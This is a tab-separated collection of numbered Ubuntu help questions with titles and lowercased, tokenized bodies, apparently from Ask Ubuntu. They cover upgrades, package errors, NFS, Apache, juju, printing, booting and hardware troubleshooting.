386111	ubuntu upgrade from 8.04 to 13.10	i have a dell power edgge 2950 server running ubuntu 8.04 . now i would like to upgrade it to to the latest version 13.10 . this server is hosting mysql database and apache server . root @ server : ~ # cat /etc/lsb-release distrib_id=ubuntu distrib_release=8.04 distrib_codename=hardy distrib_description= '' ubuntu 8.04.4 lts '' i am new to ubuntu world . i would like to understand all challenges in upgrading and how to solve the issues them .
386112	problems with libmysqlclient	pisio @ pisio-laptop ~ $ sudo dpkg -i -- force-all /var/cache/apt/archives/libmysqlclient18_5.5.34+maria-1~quantal_amd64.deb dpkg : error processing /var/cache/apt/archives/libmysqlclient18_5.5.34+maria-1~quantal_amd64.deb ( -- install ) : libmysqlclient18 : amd64 5.5.34+maria-1~quantal ( multi-arch : no ) is not co-installable with libmysqlclient18 which has multiple installed instances errors were encountered while processing : /var/cache/apt/archives/libmysqlclient18_5.5.34+maria-1~quantal_amd64.deb pisio @ pisio-laptop ~ $
386113	after cmake install	i installed ogre with no errors . when i try to run it nothing happens . i used cmake to build the software and to install . what do i need to fix this problem ? cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : egl_include_dir ( advanced ) used as include directory in directory /home/jpfeiff/downloads/ogre_src_v1-8-1/rendersystems/gles2 opengles2_include_dir ( advanced ) used as include directory in directory /home/jpfeiff/downloads/ogre_src_v1-8-1/rendersystems/gles2 now i 'm geting this when i run cmake .
386118	develop in c/c++ for qt ubuntu touch projects	as said in the question i want to develop the code in c or c++ for my ubuntu apps . i do n't feel confortable in javascript at all , and when i try to create a c or c++ file the ide returns me failed to add one or more files to project ' ... /try.cpp' here , it says clearly that apps can be developed in c and c++ too http : //www.ubuntu.com/phone/app-ecosystem http : //www.ubuntu.com/phone/operators-and-oems i 'm new in qt environment so sorry for ignorance , but i see that in qt desktop projects i can use c/c++ as well while i 'm not able to do the same thing in qt touch projects . in more , is there anyway now to develop for ubuntu touch with other sdks ?
386119	pdfsandwich - how to not change page colour	i am using pdfsandwich but it changes the colour of the pages from colour to black and white . since i have a document with many coloured pictures how can i avoid it ?
386120	how to get the software center to work for ubuntu 11.04 ( or any older version ) ?	i ca n't install ubuntu because of uefi . so , i 'm using vm-ware . sadly , it runs slow on newer versions of ubuntu . 11.04 & 10.04 run great . problem is : i ca n't use the software center . i tried replacing `` ubuntu.com '' with `` old-releases.ubuntu.com '' in /etc/apt/sources.list nothing . i run sudo apt-get update . this is what i get : http : //pastebin.com/jlrf3mwg i would install everything manually , but most of the software i use provide installation through ubuntu repositories only .
386125	ca n't find `` online accounts `` in system settings panel	i ca n't find `` online accounts `` in system settings.i have unbuntu12.04 lts .
386129	backup only some packages and restore after new installation	i have ubuntu 13.04 , i downloaded kubuntu 13.10 and i want to install it over my old ubuntu i 'm using now . i would like to save the software list and restore it after a fresh kubuntu 13.10 installation , but i want to reinstall only some packages , example : i do n't want to restore all unity packages . besides i do n't want to restore all lib packages that are installed at this moment , so i would like to restore only software that i have downloaded and installed after my first ubuntu installation ( so only user software ) . is there a way to do that ? thanks
386131	i got my printer working . how do i figure out what i did right , so i can reproduce it ?	i was doing all this different stuff ( adding/removing ppas , installing/uninstalling software ) , trying to get my printer to work . i want to find out what i did right , so that i can do it again , and , more importantly , so that other people can do it . how do i figure out what i did right ?
386135	nfs mounting hangs on ec2	i am trying to build a ubuntu 13.10 cluster on ec2 dynamically . in this cluster , one instance acts as the central nfs server . i use boto and fabric to manage the cluster . for each run , it ssh into the nfs server node and runs the following commands : sudo echo '/mnt/data 10.0.0.0/255.255.0.0 ( async , no_root_squash , rw , no_subtree_check , fsid=0 ' > /etc/exports sudo exportfs -ra sudo rpd.idmapd sudo service rpcbind restart sudo service nfs-kernel-server restart then on all other nodes , run : sudo mount -t nfs ip-10-00-xx-xx.ec2.internal : /mnt/data /mnt/data however , the client hangs on the mount command , and the /var/log/syslog has the following messages that seem to be relevant : dec 4 20:07:30 ip-10-0-0-10 kernel : [ 18128006.811330 ] rpc.mountd [ 4608 ] : segfault at ffffffffffffffff ip 00007fb848f9202b sp 00007fff3dd3c1c0 error 7 in libc-2.17.so [ 7fb848f0e000+1bd000 ] dec 4 20:07:30 ip-10-0-0-10 kernel : [ 18128006.828479 ] nfsd : last server has exited , flushing export cache dec 4 20:07:31 ip-10-0-0-10 kernel : [ 18128007.985496 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory dec 4 20:07:31 ip-10-0-0-10 kernel : [ 18128007.985516 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) and even after 90 seconds , the client hangs as well . however if i manually restart the nfs-kernel-server when there is a hanging client , the following mounting requests work well . so it is not the firewall problem . is there any reproducible and automatically way to mount nfs in such environment ?
386138	create multiple sites in a single apache instance	i need to have multiple local sites in apache . so i add a virtual host for each one : # /etc/apache2/sites-available/example.com : < virtualhost 127.0.0.1:80 > serveradmin webmaster @ example.com servername www.example.com serveralias example.com # indexes + directory root . directoryindex index.php documentroot /var/www/example.com/htdocs/ # cgi directory scriptalias /cgi-bin/ /var/www/example.com/cgi-bin/ < location /cgi-bin > options +execcgi < /location > # logfiles errorlog /var/www/example.com/logs/error.log customlog /var/www/example.com/logs/access.log combined < /virtualhost > and then i do sudo a2ensite example.com and sudo service apache2 restart . the problem is that root-relative paths do n't work . for example when i say < link href= '' /css/somefile.css '' rel= '' stylesheet '' > somewhere in /var/www/example.com/htdocs/index.php , apache fails to serve /var/www/example.com/htdocs/css/somefile.css to browser ( browsing : localhost/example.com/htdocs ) what i 'm missing ?
386141	how to find all files with size greater than ... ?	is there any gui software that can explore a tree and find all files with size greater than some amount ? neither nautilus nor nemo seem to be able to do this . in my memory , i could do this with pc-tools in dos 3.0 .
386148	`` install this third-party software '' - safe for my system or questionable ?	i am installing ubuntu atm and it asks me if i want to `` install this third-party software . '' i assume it is safe to check this box and allow it to do this , but before i blindly do so i thought i 'd ask . i searched google , and surprisingly nothing came up .
386150	virtualbox fails to start machine after installing extensions	i just added extension pack and my windows machines wo n't start . this is the error i get : failed to open a session for the virtual machine windoze 7 . the device helper structure version has changed . if you have upgraded virtualbox recently , please make sure you have terminated all vms and upgraded any extension packs . if this error persists , try re-installing virtualbox . ( verr_pdm_devhlpr3_version_mismatch ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } i really do n't want to re-install vb all over again , so i am hoping to find another solution . i tried some of the other suggested solutions but they did n't work for me . how can i fix this ?
386154	kernel panic , unable to mount root	i have recently dual booted to ubuntu 13.10 with windows 8 . i have windows 8 before having ubuntu , i had to do a boot-repair so i can choose which to load , it all went fine , no problem . but then again i decided to upgrade to windows 8.1 , i thought i can just install it , then just use a live usb , to do a boot-repair again , but it gave me this error kernel panic - not syncing : vfs : unable to mount root ( 0,0 ) what should i do ?
386155	why has n't the `` mac '' method of a application bundle with static bundled dependencies been more adopted ?	my question is in regards to application installation methods , i have been a linux desktop user for over 10 years and one thing that 's always bugged me the way applications are installed.. when i started i remember going though rpm hell attempting to track down missing dependencies , it was a nightmare.. after moving to ubuntu one thing i really like was the nicely maintained deb package management system with a easy package management system . but for the desktop and ease of use..my over all question is why has n't the `` mac '' method of a application bundle with static bundled dependencies been more adopted ? .. similar to the portablelinuxapps project ? my 2cents i think it would be great to be able to drag & drop/delete to install/remove applications . ( for a desktop's.. this would be a nightmare for server maintenance.. )
386157	steam through wine ; nothing happens after login	i have ubuntu 13.10 installed and i 'm still very new to this . i 'm still trying to grasp the system mechanics so i would like a step by step solution . i 've downloaded and installed wine 1.5 with winetricks . using winetricks i installed steam successfully . when i run steam the login screen comes up fine . the problem appears after typing in my info and logging in . it just closes , with nothing appearing . anyone have any tips ?
386159	boot-repair ubuntu windows8.1 error code oxc0000225	windows 8.1 was installed on my hard drive . i 've installed ubuntu next to it , deleted it and now got it installed on my 32gb ssd ( which was partly used by intel rapid storage tech - raid stuff ) after reboot i got into windows repair which hanged . now i get error code oxc0000225 saying i need to repair the pc . from this menu , i ca n't enter bios options , neither boot loader priority options , neither repair pc ( f8 ) . when i unplug my hard drive , i can get into ubuntu , bios menu and boot loader priority options . how do i fix this ( automatic boot repair did n't solve it ) so that i can get on windows again . my pc : hp envy 6 1150-eb boot-repair log : http : //paste.ubuntu.com/6521584/ ( also 'repair windows boot files ' option is greyed-out )
386160	how to install multiple ttf fonts for system-wide usage ?	i had `` winfonts '' folder in home directory including many true type fonts ( .ttf ) which i would like to install to be applied for use widely across ubuntu system and apps . i need help guiding me to make this step ?
386165	automatic boot up from usb	so i have ubuntu 12.04 on my usb , it loads perfectly and works . when i boot up my laptop ( windows 7 ) a menu box appears to ask how i want to run ubuntu , the first selection is default which i use , the next being somewhere along the lines of `` install ubuntu '' , then a load of other selections what i ask is , is there a way for ubuntu to boot up without bringing up the box ? like when i boot up with my normal operating system ... sorry if i 'm confusing ; _ ;
386166	fix corupt external usb disk	used win32diskimager ( img to usb utility ) to copy a ubuntu to a external 500gb hdd and now it 's corrupt ( at least for windows ) , ubuntu booted ok from it like nothing ever happened . the problem is i have ( had ) important files there and i wish to recover them . what tools are available for file recovery ? how much will it take to recover the files ? what is the fastest way ? what to expect ? thank you . methods tried : i started testdisk 7.0-wip , data recovery utility and here is the output so far : testdisk 7.0-wip , data recovery utility , october 2013 christophe grenier < grenier a t cgsecurity.org > http : //www.cgsecurity.org disk /dev/sdb - 500 gb / 465 gib - chs 60801 255 63 analyse cylinder 4672/60800 : 07 % check_fat : unusual media descriptor ( 0xf8 ! =0xf0 ) warning : number of heads/cylinder mismatches 64 ( fat ) ! = 255 ( hd ) warning : number of sectors per track mismatches 32 ( fat ) ! = 63 ( hd ) fat12 111 130 44 111 202 51 4544 [ no name ] took about 2 hours to get to 7 % ( and i accidentally stooped it )
386174	ubuntu w/ libreoffice on a tablet pc - does it have inking capabilities ?	ubuntu w/ libreoffice on a tablet pc - does it have inking capabilities ? i use mt tablet pc ( tpc ) solely for it 's inking capabilities . micro $ oft word actually has inking capabilties , so i use it all of the time . in looking to get away from m $ , does anyone know if libreoffice , and specifically writer , is ink-able ? this way i can open my word documents in writer and continue to ink on them . thanks for any info !
386177	difference between emacs24 and emacs24-lucid	after ubuntu installation ( 13.10 ) , i found two versions of emacs 24 in my software center : gnu emacs 24 ( emacs24 ) gnu emacs 24 ( emacs24-lucid ) i do n't understand what the difference between them is and which version is better to install . i am going to use emacs with scheme , clisp and other functional languages . what version preferred for me ?
386179	huawei e173 [ h3g , ubuntu 13 ]	i know somebody asked this but there is no general solution . so , how do i have to edit files in order to connect to internet ? ? please note that i would prefer a solution without downloading files . only local files edit please ! from lsusb results : ... 12d1:1c07 huawei technologies co. , ltd. ...
386184	how to decipher a bundle from juju	how do i decipher a juju bundle ? for example its a wiki bundle with instances , etc and mysql configuration with memcache . the charms deploy no relationships are established or none of the services exposed . how does a person go and read the yaml file so that the deployment bundle can be done by hand with the correct relationships etc ? in this example below , some of this i can figure out . the question is , where did amqp come from ? in the first section i can see which charms need to be deployed and understand where they will appear on the canvas . in the relations section i can see where there is a relationship for keystone and mysql . i do ok until i see '' mysql : shared-db '' - - `` nova-cloud-controller : amqp '' - `` rabbitmq-server : amqp '' what does this amqp mean ? i have seen it deploy on the public facing juju charms site and for the life of me it wont deploy locally . any help in understanding this would be greatly appreciated . openstack : services : mysql : charm : `` cs : precise/mysql-27 '' num_units : 1 annotations : '' gui-x '' : `` 572 '' '' gui-y '' : `` 428 '' '' rabbitmq-server '' : charm : `` cs : precise/rabbitmq-server-14 '' num_units : 1 annotations : '' gui-x '' : `` 300.2281494140625 '' '' gui-y '' : `` 601.203857421875 '' keystone : charm : `` cs : precise/keystone-21 '' num_units : 1 annotations : '' gui-x '' : `` 1250 '' '' gui-y '' : `` -582.5 '' '' nova-compute '' : charm : `` cs : precise/nova-compute-15 '' num_units : 1 options : '' openstack-origin '' : `` cloud : precise-grizzly '' annotations : '' gui-x '' : `` 1724.643310546875 '' '' gui-y '' : `` 710 '' '' nova-cloud-controller '' : charm : `` cs : precise/nova-cloud-controller-17 '' num_units : 1 options : '' network-manager '' : quantum '' openstack-origin '' : `` cloud : precise-grizzly '' annotations : '' gui-x '' : `` 199.90336276669336 '' '' gui-y '' : `` -472.5381696646418 '' glance : charm : `` cs : precise/glance-22 '' num_units : 1 options : '' openstack-origin '' : `` cloud : precise-grizzly '' annotations : '' gui-x '' : `` 2012.591386603307 '' '' gui-y '' : `` -193.16855882682512 '' cinder : charm : `` cs : precise/cinder-12 '' num_units : 1 options : '' openstack-origin '' : `` cloud : precise-grizzly '' annotations : '' gui-x '' : `` 1184.4137742986195 '' '' gui-y '' : `` 937.8314411731749 '' '' quantum-gateway '' : charm : `` cs : precise/quantum-gateway-9 '' num_units : 1 options : '' openstack-origin '' : `` cloud : precise-grizzly '' annotations : '' gui-x '' : `` 2011.4137742986195 '' '' gui-y '' : `` 440.0091755481749 '' '' openstack-dashboard '' : charm : `` cs : precise/openstack-dashboard-11 '' num_units : 1 annotations : '' gui-x '' : `` 1890.413896368932 '' '' gui-y '' : `` -576.9908244518251 '' relations : - - `` keystone : shared-db '' - `` mysql : shared-db '' - - `` nova-cloud-controller : cloud-compute '' - `` nova-compute : cloud-compute '' - - `` nova-cloud-controller : shared-db '' - `` mysql : shared-db '' - - `` nova-cloud-controller : amqp '' - `` rabbitmq-server : amqp '' - - `` nova-cloud-controller : identity-service '' - `` keystone : identity-service '' - - `` nova-compute : amqp '' - `` rabbitmq-server : amqp '' - - `` nova-compute : shared-db '' - `` mysql : shared-db '' - - `` nova-cloud-controller : image-service '' - `` glance : image-service '' - - `` nova-compute : image-service '' - `` glance : image-service '' - - `` glance : identity-service '' - `` keystone : identity-service '' - - `` glance : shared-db '' - `` mysql : shared-db '' - - `` nova-cloud-controller : cinder-volume-service '' - `` cinder : cinder-volume-service '' - - `` cinder : amqp '' - `` rabbitmq-server : amqp '' - - `` cinder : shared-db '' - `` mysql : shared-db '' - - `` cinder : identity-service '' - `` keystone : identity-service '' - - `` nova-cloud-controller : quantum-network-service '' - `` quantum-gateway : quantum-network-service '' - - `` quantum-gateway : amqp '' - `` rabbitmq-server : amqp '' - - `` quantum-gateway : shared-db '' - `` mysql : shared-db '' - - `` openstack-dashboard : identity-service '' - `` keystone : identity-service ''
386185	lost all networking after update ubuntu 13.04	i am unable to do networking . i did get any networking option like wired , wireless and mobile broadband . also my keyboard button also not working . i tried to fix problem through terminal . sudo service network-manager stop sudo nano networkmanager.conf but i got blank space . then i used gksudo gedit networkmanager.conf but i got blank file ... . i need material to fill there in that file ...
386193	ubuntu 13.10 clean install not really clean ?	i had ubuntu 12.04 on my laptop but it went unstable after some automatic updates . the ethernet connection would not work anymore ( it could n't find any network devices anymore ) and the only way to turn the computer off was by removing the battery . i also had many pop-ups with error messages . i 've tried many things now - installing 12.04.0 , installing 12.04.3 and 13.10 , but it 's always the same ( errors and the number of error messages vary a bit - for example with one installation the touchpad did n't work either ) . it does n't matter if i do the `` erase and reinstall '' or `` something else '' and choose manually to format ext4 , the problems are still the same . but , when i run ubuntu from my usb stick , then everything works ! so , the clean install is not really clean ? how can i get it to really delete everything and get ubuntu to run from my hard drive as good as it runs from usb stick ?
386194	suddenly all video players relying on python do not work in precise 12.04 amd64	until several days ago everything was working fine . last time i used vlc was may be a week or 2 ago . i first noticed the behaviour when trying to play a mp4 video i had played before without trouble in vlc . then i got the message : no suitable decoder module : vlc does not support the audio or video format `` h264 '' . unfortunately there is no way for you to fix this . then i successfuly played it with smplayer , umplayer , gxine , xine and gnome mplayer . however it was not possible to play it in the default ubuntu application movie player , banshee media player , dragon player and vlc media player . on all not functioning players except vlc i was hit by a pop-up window with title : install extra multimedia plugins ? python ( v2.7 ) requires to install plugins to play media files of the following type : h264 decoder gstreamer ffmpeg video plugin ( i386 ) gstreamer plugins for mms , wavpack , quicktime , musepack ( i386 ) in addition none of those players is able to play any flash video format flv ... without any message nor pop-up . for h264 , i still can play the sound but no video . trouble is i already have these packages installed in architecture amd64 . i do n't see why i would have to install plugins for i386 ? however the common point with all these players is ( may be ) they use python . i am sure for vlc that they use python . i did n't install anything python related since those video players worked fine . only the system updates . so i do n't see what else i can do and why suddenly my python 2.7 is not working anymore for vlc and other media players ? has anyone any insights on this quite unheard of situation ?
386197	problems installing ubuntu 12.04 lts using usb and bootable dvd - mac	im trying to install the developer version of ubuntu 12.04 lts desktop developer edition . it 's the 64 bit download version as my mac 's a intel core 2 duo . according to the ubuntu website , i should be able to install ubuntu using a bootable usb or dvd . the usb first ; long story short , it failed . i think this has something to do with apple nailing down its software . i could select the usb when i held alt on the keyboard - 2 usb 's appeared and none of them worked ; the screen would go black and stay black . the dvd approach has n't fared much better . i bought new dvd-rw dvd 's with a capacity of 4.7gb each . again , according to the ubuntu site , here , all i need to do is open disk utility and burn the iso to the dvd . then press c on start up and boot from there . i did that but here 's the problem - the dvd just keeps getting ejected by the mac . what 's the problem here ? if i ca n't install ubuntu onto this mac using usb or dvd - what else can i do ? thanks
386204	jump desktop for ubuntu ?	is there any way to install the jump desktop viewer on ubuntu 12.04.3 ( running on a 2004 sony vaio desktop ) so i can remotely access my mac ?
386206	flash plugin or additional plugins in firefox	i have been trying to read my online training on yahoo , but when i click the icon for training , a message box appears saying that i should install additional plugins . i have tried to install the additional plugins by selecting tools - > add-ons in firefox , but nothing seems to work . why ca n't i install the flash plugin in firefox ? and why is firefox unable to use adobe flash player ?
386209	installing ubuntu i have multiple partitions on my drive	first off this is a computer that will only be booting ubuntu 13.10 , i am installing the os from a usb drive . i have made four partitions in my harddrive , they are all in the format of ext4 . ubuntu wants to get rid of these partitions when i try to install it . any suggestions on how to get past this ? thank you
386214	transmission crashing and data loss	http : //ubuntuforums.org/showthread.php ? t=2109152 this is happening to me , in the sense that transmission is freezing , i have to force quit , and i lose all data downloaded since it was launched . it 's very annoying . it 's some sort of unity problem , it affects other windows -- transmission is just the most annoying one it happens to . this guy 's thread never got answered after a year -- i hope i do n't have to wait that long . i blame compiz . other distros have tossed it and ubuntu needs to get on board .
386216	installing java in ubuntu	this is my first time using linux ubuntu . i 'm trying to install java , i downloaded the file from the java website , extracted the file to the desktop and the extracted file 's name now is jre1.7.0_45 i 'm following this to install the java http : //www.wikihow.com/install-java-on-ubuntu but omg i ca n't even get past number 2. i get reading package lists ... done building dependency tree e : unable to locate package openjdk-7-jre how can i do this please ?
386218	trying to connect printer	i am running 13.10 on my macbook pro . i am trying to print to an hp deskjet 2510 series connected to my time capsule . i added the printer and it says it is connected , but when i try to print anything it just sits in the queue processing . any tips here ? the printer works fine when i am using osx .
386224	excecute file as a program failure ?	i want to install windows ( for school purpose ) on my laptop , so i looked up how to make a windows bootable usb from ubuntu 12.04 . i need to download an old version of unetbootin . when i go into the properties and check the 'allow executing file as program ' button , all seems right . then i go to run the file by double clicking . not a single flicker of the screen , no loading animation , no background process . i am confused . any help ? new update : if i click it enough times , it opens a process for about a second . there is no name on the process , and the user is root .
386240	from ubuntu , how do you edit files created by juju ?	is ssh the only way ? is there a way to create a root privileged ftp user ? does vsftpd support that ? and if so how would you do it ? so far , the best alternative i can come up with is lxde and xrdp but i do n't want to slow down my juju nodes like that .
386241	get error when try fstrim	below is my /etc/cron.daily/fstrim file : # ! /bin/sh # by default we assume only / is on an ssd . # you can add more ssd mount points , separated by spaces . # make sure all mount points are within the quotes . for example : # ssd_mount_points='/ /boot /home /media/my_other_ssd ' ssd_mount_points='/ /home /media/data ' for mount_point in $ ssd_mount_points do fstrim $ mount_point done and when i try : sudo /etc/cron.daily/fstrim i got this error : fstrim : /media/data : fitrim ioctl failed : inappropriate ioctl for device the file system of /media/data is ntfs-3g , i mount it in /etc/fstab , this is how i mount it : uuid=883e7f6b3e7f5164 /media/data ntfs-3g defaults , locale=en_us.utf-8 , noatime , nodiratime 0 0 why i get this error ? how can i fix it ? thanks
386242	how can i move/edit the panels ?	have just installed ubuntu 13.10 ( desktop ) , but the panels seem to be locked . i can not move or edit them , or add applets to the panels . newbie to linux ... have scoured forums and tried all the hold alt & right click or hold super & right click etc . release : ubuntu 13.10 ( saucy ) gnome : 3.8.4 ( ubuntu 2013-09-04 ) kernel : 3.11.0-14-generic ( # 21-ubuntu smp tue nov 12 17:07:40 utc 2013 ) os type : linux gcc version : 4.8 ( i686-linux-gnu ) xorg version : 1.14.3 ( 15 october 2013 09:23:29am )
386243	login bar disappears when i try to log in	i try to login but when i press enter the login bar disappears and it does n't login . it does n't work with guest or my profile . i still ca n't login . people are telling me to restore something but i do n't know how .
386247	multiple deployments , one machine , how to expose them all	in juju , if you were to create multiple wordpress ( or any other ) deployments on the same machine , how would you set that up such that all of those sites could be simultaneously exposed while being viewable ?
386249	brother mfc-7820n network printing of pdf files is extremely slow	i 've got a brother mfc-7820n configured as follows : device uri : ipp : //printy.mcnally.home make and model : brother mfc-7820n br-script3 the uri works from every computer on my network ( both linux and windows ) . i can connect to the printer at that address and look at its status etc . via its built-in http server , so i 'm pretty confident that there are no network issues . edit — the ubuntu system in question is a 13.04 installation . i 've had the same problems for quite some time however . the problem i have is that printing pdf files takes an insanely long time from my ubuntu machine ( s ) . the exact same files can be printed from windows ( both other windows 7 machines on the network , as well as a windows 7 vm on my ubuntu machine ) in a very small fraction of the time . by `` insanely long time '' i mean that a one page document can take from 5 to 15 minutes to print . sometimes they simply never finish , and i have to restart the printer after a half hour or more . the effect is the same — precisely the same — whether i print from firefox 's built-in pdf viewer or from evince or anything else . there are a zillion references on the internet to this problem , but nobody seems to really know what 's going on , and no published `` solution '' i 've seen actually works ( or has any effect whatsoever , really , other than those suggestions that make printing fail completely ) . does anybody know what it is that one needs to do in order to get an ubuntu machine to do ... whatever it is it needs to do in order to print to these brother networked printers ? ( hooking the printer up to usb or whatever is absolutely not an option for a variety of reasons . )
386250	just got a new battery for my laptop , getting some weird readouts . ubuntu 12.04	i have a dell inspiron n5010 and my old battery got old and could only hold maybe 30minutes worth of power at a time , so i got this : http : //amzn.com/b0060kkw3o and i popped it in , no problem , i made sure it was compatible and everything . acpi -v is showing battery 0 : charging , 100 % , until charged battery 0 : design capacity 6600 mah , last full capacity 6158 mah = 93 % adapter 0 : on-line thermal 0 : ok , 37.5 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 87.0 degrees c cooling 0 : processor 0 of 10 cooling 1 : processor 0 of 10 cooling 2 : processor 0 of 10 cooling 3 : processor 0 of 10 there seems to be a blank in front of `` until charged '' and it 's never been 100 % ? or ... 93 % was the last known highest ? and the gui unity battery readout is incredibly shakey and showing like ( 1:11 ) to charge at the same time of this readout ... my old battery was 6 cell and this one is 9 cell ... is there something i have to do in bios or in ubuntu to solve this ? i left it alone and closed the lid to let it fully charge and after it unplugged and re-plugged i still got the same acpi -v ... would installing tlp or jupiter or whichever help ?
386252	many usb multimedia keyboard issues in ubuntu 13.10	this same keyboard worked fine all the time in ubuntu 12.04 ( though on a different laptop ) . i now have 13.10 installed on a new laptop and i 'm getting a few annoying problems with my external usb keyboard , specifically the multimedia functions . problem 1 : the `` calculator '' or `` www/internet '' buttons do nothing . if i go to the shortcuts control panel and try to bind `` launch calculator '' to a new accelerator , pressing the calculator button does not register at all . it 's just not detecting that i pressed it . problem 2 : the volume up and volume down keys work a little bit -- however once i tap them once or twice , it infinitely keeps pressing the key forever , forcing the volume either to maximum or silent . i have to unplug the usb cable and plug it back in to stop it . i imagine this has something to do with evdev but i have no idea how to fix it . i have tried troubleshooting using the steps at https : //wiki.ubuntu.com/hotkeys/troubleshooting but when i run sudo evtest i get nothing when i press the multimedia keys ( regular keys give feedback ) . note : my laptop has a built-in keyboard with volume controls , and they work normally as expected . output of lsusb : bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 005 : id 8087:07da intel corp . bus 003 device 008 : id 1e54:2030 typematrix 2030 usb keyboard bus 003 device 006 : id 059f:0828 lacie , ltd bus 003 device 004 : id 1a40:0201 terminus technology inc. fe 2.1 7-port hub bus 003 device 003 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 002 : id 174f:1474 syntek bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub output of lsmod : module size used by bbswitch 13943 0 parport_pc 32701 0 ppdev 17671 0 rfcomm 69070 12 bnep 19564 2 snd_hda_codec_realtek 55704 1 snd_hda_codec_hdmi 41117 1 binfmt_misc 17468 1 hid_generic 12548 0 usb_storage 62062 1 joydev 17377 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc hid_logitech_dj 18581 0 videobuf2_core 40469 1 uvcvideo videodev 133390 2 uvcvideo , videobuf2_core usbhid 53014 0 btusb 28267 0 hid 105818 5 hid_generic , usbhid , hid_logitech_dj bluetooth 371880 22 bnep , btusb , rfcomm x86_pkg_temp_thermal 14162 0 coretemp 13435 0 kvm_intel 138538 0 kvm 431315 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 aesni_intel 55624 2 aes_x86_64 17131 1 aesni_intel lrw 13257 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20329 3 ghash_clmulni_intel , aesni_intel , ablk_helper snd_hda_intel 48171 7 snd_hda_codec 188738 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 4 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel arc4 12608 2 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi iwldvm 237440 0 mac80211 596969 1 iwldvm snd_rawmidi 30095 1 snd_seq_midi iwlwifi 165398 1 iwldvm snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi microcode 23518 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq snd 69141 24 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi i915 655752 6 psmouse 97626 0 serio_raw 13413 0 cfg80211 479757 3 iwlwifi , mac80211 , iwldvm drm_kms_helper 52651 1 i915 mei_me 18421 0 drm 296739 5 i915 , drm_kms_helper lpc_ich 21080 0 mei 77692 1 mei_me soundcore 12680 1 snd i2c_algo_bit 13413 1 i915 ideapad_laptop 18342 0 sparse_keymap 13948 1 ideapad_laptop wmi 19070 0 video 19318 1 i915 mac_hid 13205 0 lp 17759 0 parport 42299 3 lp , ppdev , parport_pc alx 32255 0 mdio 13807 1 alx ahci 25819 3 libahci 31898 1 ahci update july 28 , 2013 : problem still occurs in ubuntu 14.04 , though the www , mail , and calculator media keys seem to work now . the volume up/down problem persists .
386253	problems booting ubuntu , `` gave up waiting for root device ''	i had very odd things happen after i decided to upgrade my ubuntu 12.04 installation to the newer 13.10 . i decided to upgrade version by version to avoid losing my configuration . the upgrade from 12.04 to 12.10 brought up the first problems with the graphic drivers . i had to remove the ati fglrx package to get the x server to work . then similar issues in 13.04 . the worst part was after upgrading to 13.10 when ubuntu wo n't load at all . i finally tried to format the partition and make a fresh install , to no avail . at this point even going back to 12.04 wo n't solve the problem . trying to boot in safe mode will bring up the `` gave up waiting for boot device '' message ( i 'll attach a photo when i get hold of a pc - i 'm on my phone right now ) . one very odd thing i noticed is that the computer became extremely noisy , the fan is spinning as if some heavy process was consuming lots of resources , either when on the live cd or even with just the initial grub screen . typing top wo n't reveal anything . i can load my windows 7 installation on another partition just fine , and the fan quiets down in windows eventually . i think something may have happened to the mbr , but using the boot-repair package did not fix it . any ideas on what might be causing the issue / how to solve it ?
386254	how to install qt3-dev-tools package	i am using ubuntu 13.10 and want to install qt3-dev-tools package . when i run this command sudo apt-get install qt3-dev-tools i am getting this error , e : unable to locate package qt3-dev-tools please help me .
386260	cant get ubuntu 12.04 to work properly	my laptop is an hp envy 15inch screen beats edition . i have unstall windows 8. do n't want it . i have deaseble secure boot , intel visualization , everything . when i install ubuntu , all gone well . when comes to reboot at the end of installation i reboot but have no ubuntu install . i have to put the usb again to go to the install menu all over again reinstall but no look . i have seen the grub resolve issue but no luck . what i am doing wrong ? sorry for my bad english.. need help since a have no operating system at this moment and do n't what to go back to windows . and yes i am new to all this linux great world . thanks in advance .
386261	running a command at startup	i know there are lots of questions about it on the internet but none of the solutions i 've read seemed to work for me . i tried creating a script and putting my code in it - did n't work i tried writing the command directly in startup applications - did n't work . the command i want to run is : lang=en_us.utf-8 lc_messages=tr_tr.utf-8 docky & i can run other commands with the methods mentioned above but for some reason they do n't work for this particular command . so after a long research i ended up here ... any suggestions ? and can someone please explain what 's so special about this command ? it 's driving me crazy ...
386265	`` media change : please insert the disc labeled '' when trying to install ruby on rails	when i type sudo apt-get install rails i get the message : media change : please insert the disc labeled 'ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) in the drive '/media/cdrom/ ' and press enter i am new to linux and i have the installation cd in the drive , but i have no idea what disc it is asking for and i 'm not sure what /media/cdrom/ means . all i have is the installation cd and it is in the only optical drive i have .
386266	default file hierarchy for juju created instances	what is the default file hierarchy for juju created instances ? for instance , on a wordpress install , where would the wp-content folder show up ? it does n't seem to be in /var/www .
